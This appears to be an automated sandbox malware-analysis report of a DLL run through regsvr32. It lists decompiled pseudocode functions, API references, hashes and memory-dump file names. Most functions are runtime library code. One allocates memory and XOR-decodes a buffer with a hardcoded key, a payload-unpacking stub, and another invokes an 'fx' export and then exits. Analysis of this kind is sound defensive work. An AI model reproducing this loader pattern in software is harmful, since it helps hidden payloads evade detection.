Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE619D7
_aligned_msize.LIBCMTD ref: 00007FFA0AE619EC

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::EmptyQueue::StructuredWork$_aligned_msizechar_traitstype_info::_name_internal_method
String ID:
API String ID: 2899389904-0
Opcode ID: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
Instruction ID: e3b0b8e42af8ff7b6d53b76a1b0f207c40669b9ae174379adeb3ae32f112ec39
Opcode Fuzzy Hash: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
Instruction Fuzzy Hash: 6121CE73E1CA9181DA10FB62F8512AEA360FBC6BD4F004975FB8D8775AEE6CD4408B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE613A0 Relevance: 7.6, APIs: 5, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00007FFA7FFA0AE613A0(signed int __eax, long long __rcx, signed int __rdx, signed long long __r8, long long _a8, signed int _a16, signed long long _a24) {
				void* _v16;
				signed long long _v24;
				long long _v32;
				signed int _v40;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if (_a16 - 0xffffffff <= 0) goto 0xae613cd;
				E00007FFA7FFA0AE69764();
				_v24 = _a16 * _a24;
				if (_v24 - 0x1000 < 0) goto 0xae61475;
				_v40 = _a8;
				if ((_v40 & 0x0000001f) == 0) goto 0xae61409;
				E00007FFA7FFA0AE69764();
				_v16 = _v40 - 8;
				_v32 =  *_v16;
				if (_v32 - _v40 < 0) goto 0xae61435;
				E00007FFA7FFA0AE69764();
				if (_v40 - _v32 - 8 >= 0) goto 0xae61450;
				E00007FFA7FFA0AE69764();
				if (_v40 - _v32 - 0x27 <= 0) goto 0xae6146b;
				E00007FFA7FFA0AE69764();
				_a8 = _v32;
				0xae64184(); // executed
				return __eax / _a24;
			}

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA0AE613C8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA0AE61404
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA0AE61430
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA0AE6144B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA0AE61466

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
Instruction ID: 131340788814a859a47415e9bf54b3ac9a5eb0611bb4ca725407b60e4e1d260d
Opcode Fuzzy Hash: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
Instruction Fuzzy Hash: 6D211D37619B9481DA60EB69F48015EA7A4F7897E4F008A75FADD43BA9EF3CD1508B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE79510 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFA7FFA0AE79510(intOrPtr __edx, long long __rcx, void* __rdx, long long _a8, intOrPtr _a16) {
				long long _v16;
				long long _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _t35;
				signed int _t48;
				long long _t63;
				intOrPtr _t64;
				void* _t66;
				void* _t76;
				void* _t77;

				_a16 = __edx;
				_a8 = __rcx;
				_v24 = 0;
				_t63 = "*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5";
				_v16 = _t63;
				_v32 = E00007FFA7FFA0AE691B8(_t63, _t66, L"64", _t76, _t77);
				_v36 = E00007FFA7FFA0AE691B8(_t63, _t66, L"4096", _t76, _t77);
				_t35 = E00007FFA7FFA0AE691B8(_t63, _t66, L"8192", _t76, _t77);
				r9d = _v32;
				r8d = _v36 | _t35;
				VirtualAlloc(??, ??, ??, ??); // executed
				_v24 = _t63;
				if (_v24 != 0) goto 0xae7958f;
				goto 0xae795f4;
				_v40 = 0;
				goto 0xae795a3;
				_v40 = _v40 + 1;
				if (_v40 - _a16 >= 0) goto 0xae795ef;
				_t64 = _v40;
				_v28 =  *(_a8 + _t64) & 0x000000ff;
				asm("cdq");
				_t48 = _v28 ^  *(_v16 + _t64) & 0x000000ff;
				 *(_v24 + _v40) = _t48;
				goto 0xae79599;
				return _t48;
			}

APIs

VirtualAlloc.KERNELBASE ref: 00007FFA0AE79578

Strings

*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5, xrefs: 00007FFA0AE79526
8192, xrefs: 00007FFA0AE79552
4096, xrefs: 00007FFA0AE79542

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID: *sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5$4096$8192
API String ID: 4275171209-3063897839
Opcode ID: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
Instruction ID: 7229c913fcb9b7bb44c0352e5cc458db87c6c586ca01166e91777d2f1b8d48db
Opcode Fuzzy Hash: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
Instruction Fuzzy Hash: FB21F87261C6918BD764EB24F49066AB7A1FBC9754F40427AF68E83B69EF3CD5408F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE612B0 Relevance: 6.1, APIs: 4, Instructions: 51
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FFA7FFA0AE612B0(signed int __eax, signed int __rcx, signed int __rdx, signed int _a8, signed int _a16, signed char _a24) {
				long long _v16;
				long long _v24;
				signed long long _v32;
				signed long long _v40;
				void* _t40;
				long long _t54;
				signed long long _t57;
				signed long long _t58;
				void* _t60;

				_a24 = r8b;
				_a16 = __rdx;
				_a8 = __rcx;
				_v40 = 0;
				if (_a8 != 0) goto 0xae612de;
				goto 0xae61397;
				_t42 = __eax % _a16;
				if (0xffffffff - _a8 >= 0) goto 0xae612f8;
				E00007FFA7FFA0AE64E7C(__eax % _a16, 0xffffffff - _a8, 0xffffffff, _t60);
				_v32 = _a8 * _a16;
				if ((_a24 & 0x000000ff) == 0) goto 0xae6137c;
				if (_v32 - 0x1000 < 0) goto 0xae6137c;
				_v24 = _v32 + 0x27;
				_t54 = _v32;
				if (_v24 - _t54 > 0) goto 0xae6133b;
				E00007FFA7FFA0AE64E7C(_t42, _v24 - _t54, _t54, _t60);
				E00007FFA7FFA0AE63D6C(_t54, _v24); // executed
				_v16 = _t54;
				E00007FFA7FFA0AE69764();
				_t57 = _v16 + 0x00000027 & 0xffffffe0;
				_v40 = _t57;
				_t58 = _t57 * 0xffffffff;
				 *((long long*)(_v40 + _t58)) = _v16;
				goto 0xae61392;
				_t40 = E00007FFA7FFA0AE63D6C(_t58, _v32);
				_v40 = _t58;
				E00007FFA7FFA0AE69764();
				return _t40;
			}

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFA0AE612F3
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFA0AE61336
new.LIBCMT ref: 00007FFA0AE61340

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
Instruction ID: be035b680de02e6c05a0f7ee512ca309556300ce4d24455bc3046425c7704480
Opcode Fuzzy Hash: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
Instruction Fuzzy Hash: 6C21FD3251CB9581DA619B29F04032AB7A4FB897E4F004B61F6EE47BE9EF6CD1508B04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6D748 Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00007FFA7FFA0AE6D748(void* __ebp, long long __rbx, long long __rdi, long long __rsi) {
				void* _t25;
				signed long long _t45;
				signed long long _t47;
				long long _t62;
				signed long long _t63;
				signed long long _t70;
				void* _t71;
				WCHAR* _t75;

				_t45 = _t70;
				 *((long long*)(_t45 + 8)) = __rbx;
				 *((long long*)(_t45 + 0x10)) = _t62;
				 *((long long*)(_t45 + 0x18)) = __rsi;
				 *((long long*)(_t45 + 0x20)) = __rdi;
				_t71 = _t70 - 0x40; // executed
				GetEnvironmentStringsW(); // executed
				if (_t45 != 0) goto 0xae6d778;
				goto 0xae6d83b;
				_t63 = _t45;
				if ( *_t45 == 0) goto 0xae6d79d;
				_t47 = (_t45 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t63 + _t47 * 2)) != 0) goto 0xae6d784;
				if ( *((intOrPtr*)(_t63 + _t47 * 2 + 2)) != 0) goto 0xae6d780;
				 *((long long*)(_t71 + 0x38)) = __rsi;
				 *((long long*)(_t71 + 0x30)) = __rsi;
				r9d = __ebp;
				 *((intOrPtr*)(_t71 + 0x28)) = 0;
				 *(_t71 + 0x20) = __rsi;
				E00007FFA7FFA0AE6D698();
				if (0 != 0) goto 0xae6d7db;
				FreeEnvironmentStringsW(_t75);
				goto 0xae6d771;
				E00007FFA7FFA0AE6AA18(_t47, 0); // executed
				_t57 = _t47;
				if (_t47 != 0) goto 0xae6d7f4;
				_t25 = E00007FFA7FFA0AE6A9DC(_t47, 0);
				goto 0xae6d7d0;
				 *((long long*)(_t71 + 0x38)) = __rsi;
				r9d = __ebp;
				 *((long long*)(_t71 + 0x30)) = __rsi;
				 *((intOrPtr*)(_t71 + 0x28)) = r14d;
				 *(_t71 + 0x20) = _t47;
				E00007FFA7FFA0AE6D698();
				if (_t25 != 0) goto 0xae6d825;
				E00007FFA7FFA0AE6A9DC(_t47, _t47);
				goto 0xae6d82f;
				E00007FFA7FFA0AE6A9DC(_t47, _t57);
				return FreeEnvironmentStringsW(??);
			}

0x7ffa0ae6d748
0x7ffa0ae6d74b
0x7ffa0ae6d74f
0x7ffa0ae6d753
0x7ffa0ae6d757
0x7ffa0ae6d75d
0x7ffa0ae6d761
0x7ffa0ae6d76f
0x7ffa0ae6d773
0x7ffa0ae6d778
0x7ffa0ae6d77e
0x7ffa0ae6d784
0x7ffa0ae6d78c
0x7ffa0ae6d79b
0x7ffa0ae6d79d
0x7ffa0ae6d7a5
0x7ffa0ae6d7b4
0x7ffa0ae6d7b7
0x7ffa0ae6d7bd
0x7ffa0ae6d7c4
0x7ffa0ae6d7ce
0x7ffa0ae6d7d3
0x7ffa0ae6d7d9
0x7ffa0ae6d7de
0x7ffa0ae6d7e3
0x7ffa0ae6d7e9
0x7ffa0ae6d7ed
0x7ffa0ae6d7f2
0x7ffa0ae6d7f4
0x7ffa0ae6d7f9
0x7ffa0ae6d7fc
0x7ffa0ae6d804
0x7ffa0ae6d80d
0x7ffa0ae6d812
0x7ffa0ae6d819
0x7ffa0ae6d81e
0x7ffa0ae6d823
0x7ffa0ae6d827
0x7ffa0ae6d855

APIs

GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FFA0AE6A08B), ref: 00007FFA0AE6D761
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFA0AE6A08B), ref: 00007FFA0AE6D7D3

Part of subcall function 00007FFA0AE6AA18: RtlAllocateHeap.NTDLL(?,?,?,00007FFA0AE7040D,?,?,00000000,00007FFA0AE6D8B7,?,?,?,00007FFA0AE6A427,?,?,?,00007FFA0AE6A31D), ref: 00007FFA0AE6AA56

FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFA0AE6A08B), ref: 00007FFA0AE6D832

Part of subcall function 00007FFA0AE6A9DC: RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFA0AE6F492,?,?,?,00007FFA0AE6F4CF,?,?,00000000,00007FFA0AE6F144,?,?,?,00007FFA0AE6F077), ref: 00007FFA0AE6A9F2
Part of subcall function 00007FFA0AE6A9DC: GetLastError.KERNEL32(?,?,00000000,00007FFA0AE6F492,?,?,?,00007FFA0AE6F4CF,?,?,00000000,00007FFA0AE6F144,?,?,?,00007FFA0AE6F077), ref: 00007FFA0AE6A9FC

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: EnvironmentStrings$Free$AllocateErrorHeapLastPrivilegeRelease
String ID:
API String ID: 2360715157-0
Opcode ID: 375de5473a6635352b8acb40982912ac5787743cf0a9cf01d580d03713d4213a
Instruction ID: cab6d0fbac9e25100f4759fd721311af5a4139192ecf5f5f0c8bb160bb2935f5
Opcode Fuzzy Hash: 375de5473a6635352b8acb40982912ac5787743cf0a9cf01d580d03713d4213a
Instruction Fuzzy Hash: 57319232B08F6285E624BB36B88007A66A4BB56BD4F888975E94E53B95EE3CE4414300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE62970 Relevance: 4.5, APIs: 3, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FFA7FFA0AE62970(void* __edx, void* __eflags, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				signed int _v16;
				char _v48;
				long long _v56;
				signed long long _v64;
				signed int _v72;
				void* _t35;
				void* _t37;
				signed long long _t39;
				signed long long _t40;
				signed long long _t61;

				_t37 = __eflags;
				_t36 = __edx;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v56 = 0xfffffffe;
				_t39 =  *0xaede008; // 0x81ced31fdcd6
				_t40 = _t39 ^ _t61;
				_v16 = _t40;
				_v72 = 0;
				E00007FFA7FFA0AE61760(__edx,  &_v48);
				E00007FFA7FFA0AE61490(_t40, _a16);
				_v64 = _t40;
				E00007FFA7FFA0AE611A0(_a24);
				E00007FFA7FFA0AE62CC0(__edx, _t37, _v64 + _t40,  &_v48, _v64 + _t40, __r8); // executed
				E00007FFA7FFA0AE62E90( &_v48, _a16);
				E00007FFA7FFA0AE62E60( &_v48, _a24);
				E00007FFA7FFA0AE616A0(__edx, _v64 + _t40, _a8,  &_v48);
				_v72 = _v72 | 0x00000001;
				return E00007FFA7FFA0AE63A70(E00007FFA7FFA0AE61540( &_v48), _t35, _t36, _v16 ^ _t61);
			}

APIs

char_traits.LIBCPMTD ref: 00007FFA0AE629C5
type_info::_name_internal_method.LIBCMTD ref: 00007FFA0AE629EC
type_info::_name_internal_method.LIBCMTD ref: 00007FFA0AE629FE

Part of subcall function 00007FFA0AE616A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE616BC

Part of subcall function 00007FFA0AE61540: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE61567

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::EmptyQueue::StructuredWorktype_info::_name_internal_method$char_traits
String ID:
API String ID: 652137993-0
Opcode ID: 110c28662a49dc0ce0b420f88bf91af1763c08d6580e3a8db95f45a47403bc2f
Instruction ID: 862326bd618904ba04345173799094bb87bb64d5e1313777d0763dee90474c21
Opcode Fuzzy Hash: 110c28662a49dc0ce0b420f88bf91af1763c08d6580e3a8db95f45a47403bc2f
Instruction Fuzzy Hash: CD113073A18A8181DA50EB24F4911ABB760FBC57D4F405632F6CE87AA9EF3CD1458B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE61B40 Relevance: 4.5, APIs: 3, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00007FFA7FFA0AE61B40(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				signed char _t23;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFA7FFA0AE62250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0xae61b97;
				E00007FFA7FFA0AE618F0(__rax, _a8);
				E00007FFA7FFA0AE61BF0(_a16 - __rax, _a8, _a8, _a16 - __rax, _a24);
				goto 0xae61be0;
				r8d = 0;
				_t23 = E00007FFA7FFA0AE622B0(_t31, _a8, _a24); // executed
				if ((_t23 & 0x000000ff) == 0) goto 0xae61bdb;
				E00007FFA7FFA0AE618F0(_t31, _a8);
				E00007FFA7FFA0AE611E0(_t31, _a16, _a24);
				return E00007FFA7FFA0AE623A0(_t31, _a8, _a24);
			}

0x7ffa0ae61b40
0x7ffa0ae61b45
0x7ffa0ae61b4a
0x7ffa0ae61b67
0x7ffa0ae61b6e
0x7ffa0ae61b90
0x7ffa0ae61b95
0x7ffa0ae61b97
0x7ffa0ae61ba4
0x7ffa0ae61bae
0x7ffa0ae61bb5
0x7ffa0ae61bc7
0x7ffa0ae61be4

APIs

Part of subcall function 00007FFA0AE62250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6226B
Part of subcall function 00007FFA0AE62250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61B6E

Part of subcall function 00007FFA0AE618F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE618FE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61BB5
char_traits.LIBCPMTD ref: 00007FFA0AE61BC7

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$EmptyQueue::Structuredchar_traits
String ID:
API String ID: 872432861-0
Opcode ID: 231cebcbe718267e9fff52c18f272d48930a3c5afa83f06dd49d2f29f991d26b
Instruction ID: 59c7a7f15c13a96608699f1423b4263aaf34e4fae2305e5bacf1109575728850
Opcode Fuzzy Hash: 231cebcbe718267e9fff52c18f272d48930a3c5afa83f06dd49d2f29f991d26b
Instruction Fuzzy Hash: AB11C777A3CA9181DA41EB66F45146F6360FBC6BC0F106476FE8E87B5AEE2CD4008B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE63F18 Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00007FFA7FFA0AE63F18(void* __ecx) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;

				_t2 =  ==  ? 1 :  *0xaedf1a0 & 0x000000ff;
				 *0xaedf1a0 =  ==  ? 1 :  *0xaedf1a0 & 0x000000ff;
				E00007FFA7FFA0AE64760(1, _t12, _t17, _t18, _t19, _t20);
				if (E00007FFA7FFA0AE66AC0() != 0) goto 0xae63f47;
				goto 0xae63f5b; // executed
				E00007FFA7FFA0AE6A844(_t17); // executed
				if (0 != 0) goto 0xae63f59;
				E00007FFA7FFA0AE66B1C(0);
				goto 0xae63f43;
				return 1;
			}

0x7ffa0ae63f2c
0x7ffa0ae63f2f
0x7ffa0ae63f35
0x7ffa0ae63f41
0x7ffa0ae63f45
0x7ffa0ae63f47
0x7ffa0ae63f4e
0x7ffa0ae63f52
0x7ffa0ae63f57
0x7ffa0ae63f60

APIs

__isa_available_init.LIBCMT ref: 00007FFA0AE63F35
__vcrt_initialize.LIBVCRUNTIME ref: 00007FFA0AE63F3A

Part of subcall function 00007FFA0AE66AC0: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFA0AE66AC4
Part of subcall function 00007FFA0AE66AC0: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFA0AE66AC9
Part of subcall function 00007FFA0AE66AC0: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFA0AE66ACE

__vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFA0AE63F52

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
String ID:
API String ID: 3388242289-0
Opcode ID: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
Instruction ID: daf25e5ce8496a6c32db0dc259f1bd64d1f10f6f87240d7a9eb3a2dc4753e465
Opcode Fuzzy Hash: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
Instruction Fuzzy Hash: FFE01A72E0C1A345FE283771F4522F912601F2B780F48C8F9D85E4A1C3AE0D745A6561

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE73F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA0AE73F70() {
				long long _v24;
				long long _t5;
				intOrPtr _t7;

				_v24 = 0;
				_t7 =  *0xaedfdd8; // 0x180000000
				E00007FFA7FFA0AE79600(_t5, "fx", _t7, "DllRegisterServer");
				_v24 = _t5;
				ExitProcess(??);
			}

0x7ffa0ae73f74
0x7ffa0ae73f84
0x7ffa0ae73f92
0x7ffa0ae73f97
0x7ffa0ae73f9c

APIs

ExitProcess.KERNEL32 ref: 00007FFA0AE73F9C

Strings

DllRegisterServer, xrefs: 00007FFA0AE73F7D

Memory Dump Source

Source File: 00000003.00000002.315437379.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000003.00000002.315363153.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.315591914.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316165063.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316264067.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316276306.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.316288690.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer
API String ID: 621844428-1663957109
Opcode ID: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
Instruction ID: 92956b3536bb06cc5dfa8f3b5c681ce95655f0d8d7078b68330188f32a14c539
Opcode Fuzzy Hash: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
Instruction Fuzzy Hash: 0CD05E72908A92C1D720FB60F84539A23B0FF9A308FC082B1D58C42264EF3CE209CB00

Uniqueness

Uniqueness Score: -1.00%

